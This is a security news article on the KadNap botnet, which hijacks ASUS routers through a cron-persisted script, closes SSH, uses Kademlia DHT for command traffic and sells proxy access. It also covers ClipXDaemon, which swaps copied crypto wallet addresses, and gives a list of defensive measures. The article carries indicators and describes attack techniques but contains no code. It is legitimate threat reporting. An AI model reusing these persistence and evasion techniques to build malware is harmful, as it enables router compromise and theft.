KadNap: The Router Botnet Hiding in Plain Sight
- Javier Conejo del Cerro
- hace 12 minutos
- 3 Min. de lectura
A newly uncovered malware family called KadNap is quietly turning thousands of edge devices into anonymous proxy infrastructure. First observed in August 2025, the malware primarily targets routers—especially devices from ASUS—to build a decentralized botnet that routes malicious traffic for cybercriminals. Instead of relying on a traditional command-and-control server, KadNap uses the Kademlia Distributed Hash Table (DHT) protocol, embedding itself in peer-to-peer traffic to hide its infrastructure and make disruption significantly harder. Researchers have already identified more than 14,000 compromised devices, demonstrating how edge networking equipment continues to be an attractive entry point for botnet operators seeking resilient infrastructure.
Phase 1: Initial Compromise and Persistence
The infection begins when a malicious shell script named aic.sh is downloaded from the command server 212.104.141[.]140. Once executed on the device, the script establishes persistence by creating a cron job scheduled to run at the 55-minute mark of every hour. The script renames itself .asusrouter to blend in with legitimate system files and ensure continued execution even if the device is restarted.
This persistence mechanism allows the attackers to repeatedly fetch updates or additional payloads, maintaining long-term control over the compromised router. The design is simple but effective: by embedding persistence in the system’s scheduled tasks, the malware ensures that the botnet node remains active with minimal operator interaction.
Phase 2: Malware Deployment and Botnet Enrollment
After persistence is established, the script downloads a malicious ELF binary named kad, compiled for both ARM and MIPS processors, the most common architectures in consumer networking devices. Executing this binary installs the KadNap malware itself.
At this stage, the infected device joins a peer-to-peer botnet network powered by Kademlia DHT. Instead of communicating directly with a centralized server, nodes locate peers and command endpoints through distributed hash lookups. This decentralized architecture hides the operators’ infrastructure and blends botnet communication into legitimate peer-to-peer traffic.
To support these operations, additional components such as fwr.sh and /tmp/.sose are deployed. These scripts close SSH port 22, preventing administrators from easily accessing the compromised device, and extract lists of command-and-control IP:port combinations used to communicate with other nodes in the network.
Phase 3: Monetization Through Proxy Infrastructure
Once devices are integrated into the network, the botnet operators monetize the infrastructure by selling access to compromised routers as anonymous residential proxies. The service responsible for this commercialization is Doppelgänger, a proxy platform that advertises access to residential IP addresses across more than 50 countries.
Security researchers believe this service is likely a rebranding of Faceless, another proxy network previously associated with the router botnet malware TheMoon. By routing traffic through legitimate consumer devices, attackers gain a powerful capability: malicious activity appears to originate from ordinary residential connections rather than suspicious hosting infrastructure.
This approach makes the botnet extremely useful for activities such as:
anonymizing malicious traffic
bypassing geographic restrictions
conducting large-scale scanning or exploitation campaigns
hiding the origin of cybercrime operations
Phase 4: A Parallel Threat — ClipXDaemon
Alongside KadNap, researchers identified another Linux threat known as ClipXDaemon, which targets cryptocurrency users rather than routers.
Unlike traditional malware families that rely on command-and-control communication, ClipXDaemon operates autonomously. Running entirely in memory, the malware continuously monitors the clipboard in X11 environments at 200-millisecond intervals. When it detects a cryptocurrency wallet address copied by the user, it replaces that address with one controlled by the attacker.
The malware currently targets several major cryptocurrencies, including:
Bitcoin (BTC)
Ethereum (ETH)
Litecoin (LTC)
Monero (XMR)
Tron (TRX)
Dogecoin (DOGE)
Ripple (XRP)
TON
Interestingly, the malware deliberately avoids running under Wayland sessions, whose security architecture limits clipboard access. By disabling itself in these environments, the malware reduces the risk of detection or execution errors.
Measures to Fend Off the Attack
Organizations and home users running edge networking devices can significantly reduce risk by implementing the following defensive measures:
Keep router firmware fully updated and apply security patches promptly
Replace end-of-life networking devices that no longer receive updates
Change default administrative credentials immediately after installation
Restrict or disable remote management interfaces exposed to the internet
Monitor outbound traffic for unusual peer-to-peer communication patterns
Inspect scheduled tasks or cron jobs for unexpected persistence mechanisms
Regularly reboot networking equipment to disrupt potential malware execution
Use endpoint monitoring tools capable of detecting abnormal network activity
KadNap highlights a growing trend in cybercrime: the systematic exploitation of edge devices and consumer networking infrastructure. Routers, often overlooked and rarely patched, provide attackers with long-lived access points that are difficult for defenders to monitor.
By combining peer-to-peer command infrastructure, stealth persistence mechanisms, and commercial proxy monetization, KadNap demonstrates how botnet operators are evolving beyond traditional centralized architectures. At the same time, the emergence of threats like ClipXDaemon illustrates how Linux-based environments—particularly those used by developers and cryptocurrency users—are becoming increasingly attractive targets.
As organizations continue expanding their digital infrastructure toward distributed and cloud-connected environments, edge security is rapidly becoming one of the most critical yet underprotected layers of the cybersecurity landscape.
The Hacker News
Comentarios